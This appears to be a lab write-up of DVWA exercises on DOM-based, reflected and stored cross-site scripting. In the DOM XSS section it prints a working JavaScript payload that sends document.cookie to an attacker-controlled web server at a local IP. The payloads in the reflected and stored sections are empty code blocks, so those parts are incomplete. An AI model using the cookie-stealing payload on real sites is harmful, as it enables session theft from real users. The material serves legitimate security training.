# DVWA Exercises 8 ### 15 DOM Based XSS Document Object Model-based Cross-site Scripting (DOM-based XSS) is a lesser-known form of XSS. It's different from reflected and stored XSS because **the exploit happens entirely on the client-side(!)** and does not conceptually require a server-side vulnerability.
Popup from scipt alert(1)
The manipulation of the URL happens only client-side. Now let's try to inject a code that will send the cookie to the attacker. The attacker will start a webserver with a script called dom.js
``` function getIMAGE() { var img = document.createElement('img'); img.src='http://172.17.0.1:8000/' + document.cookie; document.body.appendChild(img); } getIMAGE(); ``` Let's execute the attacker payload:
![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FIc00duozMT3d4bCq6upX%2Fdom_xss07.png?alt=media\&token=e0f1d16e-d919-4397-8b73-937bac9be783) ### 16 Reflected XSS
When you submit something through a form and the website displays what you have written in plain text, that input could potentially be vulnerable to Reflected XSS. This only works if the **input** **isn't escaped** and is displayed as-is. The real gem of this attack is that the source of your script is technically the target website itself because your input is reflected by the website. So, to the browser, the script looks like it came from the website itself and thus must be secure.
``` ```
### 17 Stored XSS If you are able to store your malicious HTML in the server's database - it's called Stored XSS. Consider a social media site where you can post your comments or thoughts. If this input and/or the displaying of the text is not protected you can submit a text like ``. Anyone who visits the site and views your comment would get a pop-up alert on their browser with the message "Hello there!".
Let's put in the following attack payload: ``` ```
This script is now permanently stored in the database and will be executed for every visitor!